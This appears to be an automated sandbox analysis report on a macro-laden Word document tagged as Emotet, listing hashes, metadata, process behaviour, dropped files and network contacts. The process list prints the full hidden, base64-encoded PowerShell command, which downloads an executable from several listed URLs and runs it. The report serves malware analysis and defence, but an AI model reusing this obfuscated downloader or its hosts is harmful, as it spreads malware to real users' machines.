analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

761-0411596.doc

Full analysis: https://app.any.run/tasks/cc5542fb-60b1-4af7-a293-cf990541eed1
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 17, 2020, 13:54:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Porro., Author: Sarah Andre, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 17 06:37:00 2020, Last Saved Time/Date: Fri Jan 17 06:37:00 2020, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0
MD5:

29E4C9F49AF36FE940A25CD6DD34CBE3

SHA1:

61226D5947A89C4C3C3444C9310A49C6ECEACA1A

SHA256:

76A2283CF61F779C56455515BD42C926CDC5D833D6870C6119E6B63839052E0C

SSDEEP:

6144:Kr0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+wBExb6DwC:A0E3dxtR/iU9mvUPwBC6DwC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • Powershell.exe (PID: 2440)
    • Executed via WMI

      • Powershell.exe (PID: 2440)
    • PowerShell script executed

      • Powershell.exe (PID: 2440)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1888)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1888)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

Title: Porro.
Subject: -
Author: Sarah Andre
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:01:17 06:37:00
ModifyDate: 2020:01:17 06:37:00
Pages: 1
Words: 4
Characters: 23
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 26
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1888"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\761-0411596.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2440Powershell -w hidden -en JABNAHkAdAB0AGkAbABlAHUAaQB3AGMAPQAnAE0AZgBjAHYAcgBmAGIAdQB4AG4AYQAnADsAJABSAGEAaQBpAG4AegBhAGUAYgAgAD0AIAAnADIAMgA5ACcAOwAkAFYAbwBuAGsAYQBvAGQAaAA9ACcAQgBiAHIAegBpAHoAaABwAGQAcgB2ACcAOwAkAEMAbQByAHQAZwBrAHYAawBkAGQAYwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgBhAGkAaQBuAHoAYQBlAGIAKwAnAC4AZQB4AGUAJwA7ACQARQBtAHcAdwB0AG8AbAB0AG8AZABqAGkAZgA9ACcAQwBpAG4AZgB4AGwAdABxAG4AYgAnADsAJABOAGEAbQByAGYAawBjAGwAcgBxAGwAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBlAEIAYwBMAGkARQBuAHQAOwAkAFYAbgBpAHcAbABlAGoAaABmAG0AbQByAGIAPQAnAGgAdAB0AHAAOgAvAC8AagBhAHkAcgBhAGMAaQBuAGcALgBjAG8AbQAvADkAOQA2AHQAdAAvAFUATgBJAEQALwAqAGgAdAB0AHAAOgAvAC8AagBvAHMAZQBtAG8AbwAuAGMAbwBtAC8AVgBzADcAeAA4AGgAeQBWAEUATAAvACoAaAB0AHQAcAA6AC8ALwByAGMAbQBnAGQAZQB2ADQANAAuAHgAeQB6AC8AYwBnAGkALQBiAGkAbgAvAHIAbwBzAHMATgAzADIALwAqAGgAdAB0AHAAOgAvAC8AaQB0AGMAbwBuAHMAbwByAHQAaQB1AG0ALgBuAGUAdAAvAGkAbQBhAGcAZQBzAC8AMABvADMAMgAyADMAOQAvACoAaAB0AHQAcAA6AC8ALwBkAGUAbQB1AC4AaAB1AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFUAVwBhAGwALwAnAC4AIgBTAHAAYABMAGkAVAAiACgAJwAqACcAKQA7ACQARgBrAGMAbgBnAG4AcQBpAHgAZABzAGoAcwA9ACcATgB4AGkAcQBjAGUAdQBtAHUAZQBxAGsAbQAnADsAZgBvAHIAZQBhAGMAaAAoACQAWABmAHIAcgBnAG4AawBqAG8AIABpAG4AIAAkAFYAbgBpAHcAbABlAGoAaABmAG0AbQByAGIAKQB7AHQAcgB5AHsAJABOAGEAbQByAGYAawBjAGwAcgBxAGwALgAiAGQATwBXAG4AbABgAE8AYQBEAGYAaQBgAEwAZQAiACgAJABYAGYAcgByAGcAbgBrAGoAbwAsACAAJABDAG0AcgB0AGcAawB2AGsAZABkAGMAKQA7ACQASQB2AGgAcgBmAGoAbABxAGMAdgBwAG0AbwA9ACcARABuAGIAcABmAHMAZgBrAGkAdABrACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAQwBtAHIAdABnAGsAdgBrAGQAZABjACkALgAiAEwARQBgAE4ARwBgAFQASAAiACAALQBnAGUAIAAzADgANAA2ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAQQByAFQAIgAoACQAQwBtAHIAdABnAGsAdgBrAGQAZABjACkAOwAkAFEAZABlAHgAYwB1AHgAYgBiAHEAPQAnAEgAZwB2AG4AcgBmAG8AZAAnADsAYgByAGUAYQBrADsAJABJAHgAZgBjAGQAawB5AHgAPQAnAEMAZwBsAHMAawBwAG0AZAB0AGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQgBkAGwAeQBwAHYAYwBmAGoAZQA9ACcAVQBoAHIAegByAG0AZABlAHYAYwB6ACcA C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 776
Read events
936
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
5

Dropped files

PID
Process
Filename
Type
1888WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9814.tmp.cvr
MD5:
SHA256:
1888WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFA2E1EEB60EEA0C85.TMP
MD5:
SHA256:
2440Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\99LYD1X3YT8OZF76G5SV.temp
MD5:
SHA256:
1888WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\761-0411596.doc.LNKlnk
MD5:CAC566D28BA9F45E3A824E57E829B20B
SHA256:FCA94C8256DF6CBE09C74E1415443B91E5FA079F0F8C8C14DEC07AC251134469
1888WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:375C2DCC6A074DD52622EE3E23D79743
SHA256:EF780D037D7FD9645E6F2F1CCBF00F3683FFA3EBFAB62EC2B05CD72BDC3D8AA7
2440Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1888WINWORD.EXEC:\Users\admin\Desktop\~$1-0411596.docpgc
MD5:84C7956CF97E373ADB6A685B5E22F917
SHA256:216F96BAA3696304C7A68981FC9AAAA6BCA1E19743B0D5B0B5FD9708D9C77D80
2440Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39a4a7.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1888WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B28EDEFD40D63F16037AB3E01D512E4B
SHA256:5E947AB978E5F63F31574B6D60EBDB8048A68C0F150177DC859CB751EF182FF7
1888WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:2248E5C2449CA7D39E9A71D02FF45C1F
SHA256:E552527701C9C8353DB16FB0E9A28333F6AB4BBB764A8CF63EF0D814EAD42FD4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2440
Powershell.exe
GET
64.90.40.185:80
http://josemoo.com/Vs7x8hyVEL/
US
unknown
2440
Powershell.exe
GET
74.220.194.30:80
http://jayracing.com/996tt/UNID/
US
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2440
Powershell.exe
74.220.194.30:80
jayracing.com
Unified Layer
US
suspicious
2440
Powershell.exe
64.90.40.185:80
josemoo.com
New Dream Network, LLC
US
unknown

DNS requests

Domain
IP
Reputation
jayracing.com
  • 74.220.194.30
suspicious
josemoo.com
  • 64.90.40.185
unknown

Threats

No threats detected
No debug info